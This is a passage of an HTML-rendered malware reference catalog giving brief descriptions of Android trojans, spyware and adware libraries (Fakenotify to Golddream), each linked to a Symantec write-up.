</table>
</div>
<div class="sect2">
<h3 id="_fakenotify"><a class="anchor" href="#_fakenotify"></a><a class="link" href="#_fakenotify">Fakenotify</a></h3>
<div class="paragraph">
<p>Fakenotify is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers, collects and sends information, and periodically displays Web pages. It also downloads legitimate apps onto the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 145. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-011302-3052-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-011302-3052-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakepatch"><a class="anchor" href="#_fakepatch"></a><a class="link" href="#_fakepatch">Fakepatch</a></h3>
<div class="paragraph">
<p>Fakepatch is a Trojan horse for Android devices that downloads more files on to the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 146. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-062811-2820-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-062811-2820-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakeplay"><a class="anchor" href="#_fakeplay"></a><a class="link" href="#_fakeplay">Fakeplay</a></h3>
<div class="paragraph">
<p>Fakeplay is a Trojan horse for Android devices that steals information from the compromised device and sends it to a predetermined email address.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 147. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-100917-3825-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-100917-3825-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakescarav"><a class="anchor" href="#_fakescarav"></a><a class="link" href="#_fakescarav">Fakescarav</a></h3>
<div class="paragraph">
<p>Fakescarav is a Trojan horse for Android devices that displays fake security alerts in an attempt to convince the user to pay in order to remove non-existent malware or security risks from the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 148. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-012809-1901-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-012809-1901-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakesecsuit"><a class="anchor" href="#_fakesecsuit"></a><a class="link" href="#_fakesecsuit">Fakesecsuit</a></h3>
<div class="paragraph">
<p>Fakesecsuit is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 149. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-060514-1301-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-060514-1301-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakesucon"><a class="anchor" href="#_fakesucon"></a><a class="link" href="#_fakesucon">Fakesucon</a></h3>
<div class="paragraph">
<p>Fakesucon is a Trojan horse program for Android devices that sends SMS messages to premium-rate phone numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 150. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-120915-2524-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-120915-2524-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_faketaobao"><a class="anchor" href="#_faketaobao"></a><a class="link" href="#_faketaobao">Faketaobao</a></h3>
<div class="paragraph">
<p>Faketaobao is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 151. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-062518-4057-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-062518-4057-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_faketaobao_b"><a class="anchor" href="#_faketaobao_b"></a><a class="link" href="#_faketaobao_b">Faketaobao.B</a></h3>
<div class="paragraph">
<p>Faketaobao.B is a Trojan horse for Android devices that intercepts and and sends incoming SMS messages to a remote attacker.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 152. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-012106-4013-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-012106-4013-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_faketoken"><a class="anchor" href="#_faketoken"></a><a class="link" href="#_faketoken">Faketoken</a></h3>
<div class="paragraph">
<p>Faketoken is a Trojan horse that opens a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 153. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-032211-2048-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-032211-2048-99</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://bgr.com/2017/08/18/android-malware-faketoken-steal-credit-card-info/">http://bgr.com/2017/08/18/android-malware-faketoken-steal-credit-card-info/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakeupdate"><a class="anchor" href="#_fakeupdate"></a><a class="link" href="#_fakeupdate">Fakeupdate</a></h3>
<div class="paragraph">
<p>Fakeupdate is a Trojan horse for Android devices that downloads other applications onto the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 154. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-081914-5637-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-081914-5637-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakevoice"><a class="anchor" href="#_fakevoice"></a><a class="link" href="#_fakevoice">Fakevoice</a></h3>
<div class="paragraph">
<p>Fakevoice is a Trojan horse for Android devices that dials a premium-rate phone number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 155. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-040510-3249-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-040510-3249-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_farmbaby"><a class="anchor" href="#_farmbaby"></a><a class="link" href="#_farmbaby">Farmbaby</a></h3>
<div class="paragraph">
<p>Farmbaby is a spyware application for Android devices that logs certain information and sends SMS messages to a predetermined phone number.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 156. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-090715-3641-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-090715-3641-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fauxtocopy"><a class="anchor" href="#_fauxtocopy"></a><a class="link" href="#_fauxtocopy">Fauxtocopy</a></h3>
<div class="paragraph">
<p>Fauxtocopy is a spyware application for Android devices that gathers photos from the device and sends them to a predetermined email address.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 157. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-111515-3940-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-111515-3940-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_feiwo"><a class="anchor" href="#_feiwo"></a><a class="link" href="#_feiwo">Feiwo</a></h3>
<div class="paragraph">
<p>Feiwo is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 158. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-4038-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-4038-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_findandcall"><a class="anchor" href="#_findandcall"></a><a class="link" href="#_findandcall">FindAndCall</a></h3>
<div class="paragraph">
<p>FindAndCall is a Potentially Unwanted Application for Android devices that may leak information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 159. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031020-2906-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031020-2906-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_finfish"><a class="anchor" href="#_finfish"></a><a class="link" href="#_finfish">Finfish</a></h3>
<div class="paragraph">
<p>Finfish is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 160. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-083016-0032-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-083016-0032-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fireleaker"><a class="anchor" href="#_fireleaker"></a><a class="link" href="#_fireleaker">Fireleaker</a></h3>
<div class="paragraph">
<p>Fireleaker is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 161. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031814-5207-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031814-5207-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fitikser"><a class="anchor" href="#_fitikser"></a><a class="link" href="#_fitikser">Fitikser</a></h3>
<div class="paragraph">
<p>Fitikser is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 162. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-093015-2830-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-093015-2830-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flexispy"><a class="anchor" href="#_flexispy"></a><a class="link" href="#_flexispy">Flexispy</a></h3>
<div class="paragraph">
<p>Flexispy is a Spyware application for Android devices that logs the device&#8217;s activity and sends it to a predetermined website.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 163. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-122006-4805-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-122006-4805-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fokonge"><a class="anchor" href="#_fokonge"></a><a class="link" href="#_fokonge">Fokonge</a></h3>
<div class="paragraph">
<p>Fokonge is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 164. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-071802-0727-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-071802-0727-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_foncysms"><a class="anchor" href="#_foncysms"></a><a class="link" href="#_foncysms">FoncySMS</a></h3>
<div class="paragraph">
<p>FoncySMS is a Trojan horse for Android devices that sends SMS messages to premium-rate phone numbers. It may also connect to an IRC server and execute any received shell commands.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 165. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-011502-2651-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-011502-2651-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_frogonal"><a class="anchor" href="#_frogonal"></a><a class="link" href="#_frogonal">Frogonal</a></h3>
<div class="paragraph">
<p>Frogonal is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 166. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-062205-2312-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-062205-2312-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ftad"><a class="anchor" href="#_ftad"></a><a class="link" href="#_ftad">Ftad</a></h3>
<div class="paragraph">
<p>Ftad is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 167. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040114-2020-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040114-2020-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_funtasy"><a class="anchor" href="#_funtasy"></a><a class="link" href="#_funtasy">Funtasy</a></h3>
<div class="paragraph">
<p>Funtasy is a Trojan horse for Android devices that subscribes the user to premium SMS services.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 168. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-092519-5811-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-092519-5811-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gallme"><a class="anchor" href="#_gallme"></a><a class="link" href="#_gallme">GallMe</a></h3>
<div class="paragraph">
<p>GallMe is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 169. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-1336-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-1336-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gamex"><a class="anchor" href="#_gamex"></a><a class="link" href="#_gamex">Gamex</a></h3>
<div class="paragraph">
<p>Gamex is a Trojan horse for Android devices that downloads further threats.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 170. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-051015-1808-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-051015-1808-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gappusin"><a class="anchor" href="#_gappusin"></a><a class="link" href="#_gappusin">Gappusin</a></h3>
<div class="paragraph">
<p>Gappusin is a Trojan horse for Android devices that downloads applications and disguises them as system updates.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 171. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-022007-2013-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-022007-2013-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gazon"><a class="anchor" href="#_gazon"></a><a class="link" href="#_gazon">Gazon</a></h3>
<div class="paragraph">
<p>Gazon is a worm for Android devices that spreads through SMS messages.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 172. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-030320-1436-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-030320-1436-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_geinimi"><a class="anchor" href="#_geinimi"></a><a class="link" href="#_geinimi">Geinimi</a></h3>
<div class="paragraph">
<p>Geinimi is a Trojan that opens a back door and transmits information from the device to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 173. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-010111-5403-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-010111-5403-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_generisk"><a class="anchor" href="#_generisk"></a><a class="link" href="#_generisk">Generisk</a></h3>
<div class="paragraph">
<p>Generisk is a generic detection for Android applications that may pose a privacy, security, or stability risk to the user or user&#8217;s Android device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 174. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-062622-1559-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-062622-1559-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_genheur"><a class="anchor" href="#_genheur"></a><a class="link" href="#_genheur">Genheur</a></h3>
<div class="paragraph">
<p>Genheur is a generic detection for many individual but varied Trojans for Android devices for which specific definitions have not been created. A generic detection is used because it protects against many Trojans that share similar characteristics.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 175. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032613-0848-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032613-0848-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_genpush"><a class="anchor" href="#_genpush"></a><a class="link" href="#_genpush">Genpush</a></h3>
<div class="paragraph">
<p>Genpush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 176. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-033109-0426-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-033109-0426-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_geofake"><a class="anchor" href="#_geofake"></a><a class="link" href="#_geofake">GeoFake</a></h3>
<div class="paragraph">
<p>GeoFake is a Trojan horse for Android devices that sends SMS messages to premium-rate numbers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 177. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-040217-3232-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-040217-3232-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_geplook"><a class="anchor" href="#_geplook"></a><a class="link" href="#_geplook">Geplook</a></h3>
<div class="paragraph">
<p>Geplook is a Trojan horse for Android devices that downloads additional apps onto the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 178. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-121814-0917-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-121814-0917-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_getadpush"><a class="anchor" href="#_getadpush"></a><a class="link" href="#_getadpush">Getadpush</a></h3>
<div class="paragraph">
<p>Getadpush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 179. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040112-0957-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040112-0957-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ggtracker"><a class="anchor" href="#_ggtracker"></a><a class="link" href="#_ggtracker">Ggtracker</a></h3>
<div class="paragraph">
<p>Ggtracker is a Trojan horse for Android devices that sends SMS messages to a premium-rate number. It may also steal information from the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 180. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-062208-5013-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-062208-5013-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ghostpush"><a class="anchor" href="#_ghostpush"></a><a class="link" href="#_ghostpush">Ghostpush</a></h3>
<div class="paragraph">
<p>Ghostpush is a Trojan horse for Android devices that roots the compromised device. It may then perform malicious activities on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 181. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-100215-3718-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-100215-3718-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gmaster"><a class="anchor" href="#_gmaster"></a><a class="link" href="#_gmaster">Gmaster</a></h3>
<div class="paragraph">
<p>Gmaster is a Trojan horse on the Android platform that steals potentially confidential information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 182. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-082404-5049-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-082404-5049-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_godwon"><a class="anchor" href="#_godwon"></a><a class="link" href="#_godwon">Godwon</a></h3>
<div class="paragraph">
<p>Godwon is a Trojan horse for Android devices that steals information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 183. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-091017-1833-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-091017-1833-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_golddream"><a class="anchor" href="#_golddream"></a><a class="link" href="#_golddream">Golddream</a></h3>
<div class="paragraph">
<p>Golddream is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 184. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
